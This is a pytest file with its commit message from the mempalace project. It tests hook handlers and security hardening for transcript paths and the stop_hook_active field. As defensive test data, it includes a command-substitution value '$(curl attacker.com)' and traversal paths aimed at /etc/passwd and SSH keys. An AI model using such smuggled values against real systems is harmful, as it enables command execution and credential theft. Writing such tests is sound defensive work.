Files
mempalace/tests/test_hooks_cli.py
T
BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00

485 lines
15 KiB
Python

import contextlib
import io
import json
from pathlib import Path
from unittest.mock import patch
import pytest
from mempalace.hooks_cli import (
SAVE_INTERVAL,
STOP_BLOCK_REASON,
PRECOMPACT_BLOCK_REASON,
_count_human_messages,
_log,
_maybe_auto_ingest,
_parse_harness_input,
_sanitize_session_id,
_validate_transcript_path,
hook_stop,
hook_session_start,
hook_precompact,
run_hook,
)
# --- _sanitize_session_id ---
def test_sanitize_normal_id():
    """An ID made of letters, digits, '-' and '_' comes back unchanged."""
    session_id = "abc-123_XYZ"
    assert _sanitize_session_id(session_id) == session_id
def test_sanitize_strips_dangerous_chars():
    """A traversal-style ID is reduced to ``"etcpasswd"``."""
    cleaned = _sanitize_session_id("../../etc/passwd")
    assert cleaned == "etcpasswd"
def test_sanitize_empty_returns_unknown():
    """An empty ID and an ID of only ``!`` characters both yield ``"unknown"``."""
    for raw in ("", "!!!"):
        assert _sanitize_session_id(raw) == "unknown"
# --- _count_human_messages ---
def _write_transcript(path: Path, entries: list[dict]):
    """Write *entries* to *path* as UTF-8 text, one ``json.dumps`` result per line."""
    with open(path, "w", encoding="utf-8") as handle:
        # Generator keeps serialization lazy, one entry at a time.
        handle.writelines(json.dumps(record) + "\n" for record in entries)
def test_count_human_messages_basic(tmp_path):
    """Two ``user`` entries and one ``assistant`` entry give a count of 2."""
    path = tmp_path / "t.jsonl"
    turns = (("user", "hello"), ("assistant", "hi"), ("user", "bye"))
    entries = [{"message": {"role": role, "content": text}} for role, text in turns]
    _write_transcript(path, entries)
    assert _count_human_messages(str(path)) == 2
def test_count_skips_command_messages(tmp_path):
    """A user entry whose content is a ``<command-message>`` is not counted."""
    path = tmp_path / "t.jsonl"
    command_entry = {
        "message": {"role": "user", "content": "<command-message>status</command-message>"}
    }
    real_entry = {"message": {"role": "user", "content": "real question"}}
    _write_transcript(path, [command_entry, real_entry])
    assert _count_human_messages(str(path)) == 1
def test_count_handles_list_content(tmp_path):
    """List-form content: the plain text entry counts, the command entry does not."""
    path = tmp_path / "t.jsonl"
    texts = ("hello", "<command-message>x</command-message>")
    entries = [
        {"message": {"role": "user", "content": [{"type": "text", "text": text}]}}
        for text in texts
    ]
    _write_transcript(path, entries)
    assert _count_human_messages(str(path)) == 1
def test_count_missing_file():
    """A transcript path that does not exist yields a count of zero."""
    missing = "/nonexistent/path.jsonl"
    assert _count_human_messages(missing) == 0
def test_count_empty_file(tmp_path):
    """An existing but empty transcript yields a count of zero."""
    empty = tmp_path / "t.jsonl"
    empty.write_text("")
    count = _count_human_messages(str(empty))
    assert count == 0
def test_count_malformed_json_lines(tmp_path):
    """A non-JSON line is skipped; the valid user line after it is still counted."""
    path = tmp_path / "t.jsonl"
    path.write_text('not json\n{"message": {"role": "user", "content": "ok"}}\n')
    count = _count_human_messages(str(path))
    assert count == 1
# --- hook_stop ---
def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
    """Run a hook and return the JSON payload it passed to ``_output``.

    Args:
        hook_fn: Hook callable, invoked as ``hook_fn(data, harness)``.
        data: Input dict handed to the hook.
        harness: Harness name forwarded to the hook.
        state_dir: When given, ``mempalace.hooks_cli.STATE_DIR`` is patched to
            this value for the duration of the call.

    Returns:
        The emitted payload after a JSON round-trip (``dumps`` then ``loads``).

    Raises:
        AssertionError: If the hook did not call ``_output`` exactly once.
    """
    emitted = []
    patches = [
        patch(
            "mempalace.hooks_cli._output",
            # Serialize at call time so later mutation of the payload cannot
            # change what was captured.
            side_effect=lambda payload: emitted.append(json.dumps(payload)),
        )
    ]
    if state_dir is not None:
        patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
    with contextlib.ExitStack() as stack:
        for p in patches:
            stack.enter_context(p)
        hook_fn(data, harness)
    # Fail with a readable message instead of a JSONDecodeError on empty or
    # concatenated output.
    assert len(emitted) == 1, f"expected exactly one _output call, got {len(emitted)}"
    return json.loads(emitted[0])
def test_stop_hook_passthrough_when_active(tmp_path):
    """With ``stop_hook_active`` set to ``True`` the stop hook emits ``{}``."""
    # Passing state_dir makes the helper patch STATE_DIR itself, so no outer
    # patch is needed (matches the other hook_stop tests).
    result = _capture_hook_output(
        hook_stop,
        {"session_id": "test", "stop_hook_active": True, "transcript_path": ""},
        state_dir=tmp_path,
    )
    assert result == {}
def test_stop_hook_passthrough_when_active_string(tmp_path):
    """With ``stop_hook_active`` given as the string ``"true"`` the hook emits ``{}``."""
    # Passing state_dir makes the helper patch STATE_DIR itself, so no outer
    # patch is needed (matches the other hook_stop tests).
    result = _capture_hook_output(
        hook_stop,
        {"session_id": "test", "stop_hook_active": "true", "transcript_path": ""},
        state_dir=tmp_path,
    )
    assert result == {}
def test_stop_hook_passthrough_below_interval(tmp_path):
    """With ``SAVE_INTERVAL - 1`` user messages the stop hook emits ``{}``."""
    path = tmp_path / "t.jsonl"
    entries = []
    for i in range(SAVE_INTERVAL - 1):
        entries.append({"message": {"role": "user", "content": f"msg {i}"}})
    _write_transcript(path, entries)
    payload = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(path)}
    result = _capture_hook_output(hook_stop, payload, state_dir=tmp_path)
    assert result == {}
def test_stop_hook_blocks_at_interval(tmp_path):
    """With ``SAVE_INTERVAL`` user messages the hook blocks with ``STOP_BLOCK_REASON``."""
    path = tmp_path / "t.jsonl"
    entries = []
    for i in range(SAVE_INTERVAL):
        entries.append({"message": {"role": "user", "content": f"msg {i}"}})
    _write_transcript(path, entries)
    payload = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(path)}
    result = _capture_hook_output(hook_stop, payload, state_dir=tmp_path)
    assert result["decision"] == "block"
    assert result["reason"] == STOP_BLOCK_REASON
def test_stop_hook_tracks_save_point(tmp_path):
    """A second stop-hook call with an unchanged transcript emits ``{}``."""
    path = tmp_path / "t.jsonl"
    entries = []
    for i in range(SAVE_INTERVAL):
        entries.append({"message": {"role": "user", "content": f"msg {i}"}})
    _write_transcript(path, entries)
    payload = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(path)}

    # First call blocks
    first = _capture_hook_output(hook_stop, payload, state_dir=tmp_path)
    assert first["decision"] == "block"

    # Second call with same count passes through (already saved)
    second = _capture_hook_output(hook_stop, payload, state_dir=tmp_path)
    assert second == {}
# --- hook_session_start ---
def test_session_start_passes_through(tmp_path):
    """The session-start hook emits an empty payload."""
    payload = {"session_id": "test"}
    emitted = _capture_hook_output(hook_session_start, payload, state_dir=tmp_path)
    assert emitted == {}
# --- hook_precompact ---
def test_precompact_always_blocks(tmp_path):
    """The precompact hook emits a block decision with ``PRECOMPACT_BLOCK_REASON``."""
    payload = {"session_id": "test"}
    emitted = _capture_hook_output(hook_precompact, payload, state_dir=tmp_path)
    assert emitted["decision"] == "block"
    assert emitted["reason"] == PRECOMPACT_BLOCK_REASON
# --- _log ---
def test_log_writes_to_hook_log(tmp_path):
    """``_log`` puts its message into ``hook.log`` under the patched ``STATE_DIR``."""
    with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
        _log("test message")
    hook_log = tmp_path / "hook.log"
    assert hook_log.is_file()
    assert "test message" in hook_log.read_text()
def test_log_oserror_is_silenced(tmp_path):
    """_log should not raise if the directory cannot be created."""
    # Put a regular file in the parent chain: creating or opening anything
    # beneath it raises an OSError subclass for every user, including root,
    # and nothing is ever written outside tmp_path. An absolute
    # "/nonexistent/..." path can actually be created when running as root.
    blocker = tmp_path / "not_a_dir"
    blocker.write_text("")
    with patch("mempalace.hooks_cli.STATE_DIR", blocker / "nested"):
        # Should not raise
        _log("this will fail silently")
# --- _maybe_auto_ingest ---
def test_maybe_auto_ingest_no_env(tmp_path):
    """Without MEMPAL_DIR set, does nothing."""
    with patch.dict("os.environ", {}, clear=True):
        with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
            # Patch Popen so a regression cannot spawn a real process, and so
            # "does nothing" is actually asserted rather than assumed.
            with patch("mempalace.hooks_cli.subprocess.Popen") as mock_popen:
                _maybe_auto_ingest()  # should not raise
    mock_popen.assert_not_called()
def test_maybe_auto_ingest_with_env(tmp_path):
    """With MEMPAL_DIR pointing at an existing directory, ``Popen`` is called once."""
    project_dir = tmp_path / "project"
    project_dir.mkdir()
    env = {"MEMPAL_DIR": str(project_dir)}
    with contextlib.ExitStack() as stack:
        stack.enter_context(patch.dict("os.environ", env))
        stack.enter_context(patch("mempalace.hooks_cli.STATE_DIR", tmp_path))
        popen_mock = stack.enter_context(patch("mempalace.hooks_cli.subprocess.Popen"))
        _maybe_auto_ingest()
        popen_mock.assert_called_once()
def test_maybe_auto_ingest_oserror(tmp_path):
    """An ``OSError`` raised by ``Popen`` does not propagate to the caller."""
    project_dir = tmp_path / "project"
    project_dir.mkdir()
    env = {"MEMPAL_DIR": str(project_dir)}
    with contextlib.ExitStack() as stack:
        stack.enter_context(patch.dict("os.environ", env))
        stack.enter_context(patch("mempalace.hooks_cli.STATE_DIR", tmp_path))
        stack.enter_context(
            patch("mempalace.hooks_cli.subprocess.Popen", side_effect=OSError("fail"))
        )
        _maybe_auto_ingest()  # should not raise
# --- _parse_harness_input ---
def test_parse_harness_input_unknown():
    """An unrecognized harness name exits the process with status 1."""
    payload = {"session_id": "test"}
    with pytest.raises(SystemExit) as raised:
        _parse_harness_input(payload, "unknown-harness")
    exit_code = raised.value.code
    assert exit_code == 1
def test_parse_harness_input_valid():
    """For ``claude-code``, ``session_id`` and ``stop_hook_active`` come through as given."""
    raw = {"session_id": "abc-123", "stop_hook_active": True, "transcript_path": "/tmp/t.jsonl"}
    parsed = _parse_harness_input(raw, "claude-code")
    assert parsed["session_id"] == "abc-123"
    assert parsed["stop_hook_active"] is True
# --- hook_stop with OSError on write ---
def test_stop_hook_oserror_on_last_save_read(tmp_path):
    """A non-numeric ``test_last_save`` file does not stop the hook from blocking."""
    path = tmp_path / "t.jsonl"
    entries = []
    for i in range(SAVE_INTERVAL):
        entries.append({"message": {"role": "user", "content": f"msg {i}"}})
    _write_transcript(path, entries)

    # Write invalid content to last save file
    last_save = tmp_path / "test_last_save"
    last_save.write_text("not_a_number")

    payload = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(path)}
    result = _capture_hook_output(hook_stop, payload, state_dir=tmp_path)
    assert result["decision"] == "block"
def test_stop_hook_oserror_on_write(tmp_path):
    """When write to last_save_file fails, hook still outputs correctly."""
    transcript = tmp_path / "t.jsonl"
    _write_transcript(
        transcript,
        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
    )

    def bad_write_text(*args, **kwargs):
        raise OSError("disk full")

    # Only Path.write_text needs patching here: passing state_dir makes the
    # helper patch STATE_DIR itself, as in the other hook_stop tests.
    with patch.object(Path, "write_text", bad_write_text):
        result = _capture_hook_output(
            hook_stop,
            {
                "session_id": "test",
                "stop_hook_active": False,
                "transcript_path": str(transcript),
            },
            state_dir=tmp_path,
        )
    assert result["decision"] == "block"
# --- hook_precompact with MEMPAL_DIR ---
def test_precompact_with_mempal_dir(tmp_path):
    """With MEMPAL_DIR set, precompact blocks and calls ``subprocess.run`` once."""
    project_dir = tmp_path / "project"
    project_dir.mkdir()
    env = {"MEMPAL_DIR": str(project_dir)}
    with patch.dict("os.environ", env), patch("mempalace.hooks_cli.subprocess.run") as run_mock:
        emitted = _capture_hook_output(hook_precompact, {"session_id": "test"}, state_dir=tmp_path)
    assert emitted["decision"] == "block"
    run_mock.assert_called_once()
def test_precompact_with_mempal_dir_oserror(tmp_path):
    """Precompact still blocks when ``subprocess.run`` raises ``OSError``."""
    project_dir = tmp_path / "project"
    project_dir.mkdir()
    env = {"MEMPAL_DIR": str(project_dir)}
    failing_run = patch("mempalace.hooks_cli.subprocess.run", side_effect=OSError("fail"))
    with patch.dict("os.environ", env), failing_run:
        emitted = _capture_hook_output(hook_precompact, {"session_id": "test"}, state_dir=tmp_path)
    assert emitted["decision"] == "block"
# --- run_hook ---
def test_run_hook_dispatches_session_start(tmp_path):
    """``run_hook("session-start", ...)`` with JSON on stdin emits ``{}`` via ``_output``."""
    fake_stdin = io.StringIO(json.dumps({"session_id": "run-test"}))
    with contextlib.ExitStack() as stack:
        stack.enter_context(patch("sys.stdin", fake_stdin))
        stack.enter_context(patch("mempalace.hooks_cli.STATE_DIR", tmp_path))
        output_mock = stack.enter_context(patch("mempalace.hooks_cli._output"))
        run_hook("session-start", "claude-code")
    output_mock.assert_called_once_with({})
def test_run_hook_dispatches_stop(tmp_path):
    """``run_hook("stop", ...)`` below the save interval emits ``{}`` via ``_output``."""
    transcript = tmp_path / "t.jsonl"
    # Derive the message count from SAVE_INTERVAL (as the below-interval
    # hook_stop test does) so this does not silently depend on the interval
    # being larger than a hard-coded 3.
    _write_transcript(
        transcript,
        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL - 1)],
    )
    stdin_data = json.dumps(
        {
            "session_id": "run-test",
            "stop_hook_active": False,
            "transcript_path": str(transcript),
        }
    )
    with patch("sys.stdin", io.StringIO(stdin_data)):
        with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
            with patch("mempalace.hooks_cli._output") as mock_output:
                run_hook("stop", "claude-code")
    mock_output.assert_called_once_with({})
def test_run_hook_dispatches_precompact(tmp_path):
    """``run_hook("precompact", ...)`` emits one payload whose decision is ``"block"``."""
    fake_stdin = io.StringIO(json.dumps({"session_id": "run-test"}))
    with contextlib.ExitStack() as stack:
        stack.enter_context(patch("sys.stdin", fake_stdin))
        stack.enter_context(patch("mempalace.hooks_cli.STATE_DIR", tmp_path))
        output_mock = stack.enter_context(patch("mempalace.hooks_cli._output"))
        run_hook("precompact", "claude-code")
    output_mock.assert_called_once()
    # First positional argument of the single recorded call.
    emitted = output_mock.call_args.args[0]
    assert emitted["decision"] == "block"
def test_run_hook_unknown_hook():
    """An unrecognized hook name exits the process with status 1."""
    fake_stdin = io.StringIO(json.dumps({"session_id": "test"}))
    with patch("sys.stdin", fake_stdin), pytest.raises(SystemExit) as raised:
        run_hook("nonexistent", "claude-code")
    assert raised.value.code == 1
def test_run_hook_invalid_json(tmp_path):
    """Non-JSON stdin does not crash ``run_hook``; session-start still emits ``{}``."""
    fake_stdin = io.StringIO("not valid json")
    with contextlib.ExitStack() as stack:
        stack.enter_context(patch("sys.stdin", fake_stdin))
        stack.enter_context(patch("mempalace.hooks_cli.STATE_DIR", tmp_path))
        output_mock = stack.enter_context(patch("mempalace.hooks_cli._output"))
        run_hook("session-start", "claude-code")
    output_mock.assert_called_once_with({})
# --- Security: transcript_path validation ---
def test_validate_transcript_rejects_path_traversal():
    """Paths containing ``..`` components validate to ``None``."""
    for candidate in ("../../etc/passwd", "../../../.ssh/id_rsa"):
        assert _validate_transcript_path(candidate) is None
def test_validate_transcript_rejects_wrong_extension():
    """Paths ending in ``.txt``, ``.py`` or no extension validate to ``None``."""
    rejected = (
        "/tmp/transcript.txt",
        "/tmp/secret.py",
        "/home/user/.ssh/id_rsa",
    )
    for candidate in rejected:
        assert _validate_transcript_path(candidate) is None
def test_validate_transcript_accepts_valid_paths(tmp_path):
    """Existing ``.jsonl`` and ``.json`` files validate to a path with the same suffix."""
    for suffix in (".jsonl", ".json"):
        candidate = tmp_path / f"session{suffix}"
        candidate.touch()
        validated = _validate_transcript_path(str(candidate))
        assert validated is not None
        assert validated.suffix == suffix
def test_validate_transcript_empty_string():
    """An empty transcript path validates to ``None``."""
    validated = _validate_transcript_path("")
    assert validated is None
def test_count_rejects_traversal_path():
    """``_count_human_messages`` gives 0 for a ``..`` traversal path."""
    traversal = "../../etc/passwd"
    assert _count_human_messages(traversal) == 0
def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
    """A shell-injection string in ``stop_hook_active`` does not trigger passthrough."""
    path = tmp_path / "t.jsonl"
    entries = []
    for i in range(SAVE_INTERVAL):
        entries.append({"message": {"role": "user", "content": f"msg {i}"}})
    _write_transcript(path, entries)

    # Simulate a malicious stop_hook_active value
    malicious = {
        "session_id": "test",
        "stop_hook_active": "$(curl attacker.com)",
        "transcript_path": str(path),
    }
    result = _capture_hook_output(hook_stop, malicious, state_dir=tmp_path)

    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
    # It should count messages and block at the interval
    assert result["decision"] == "block"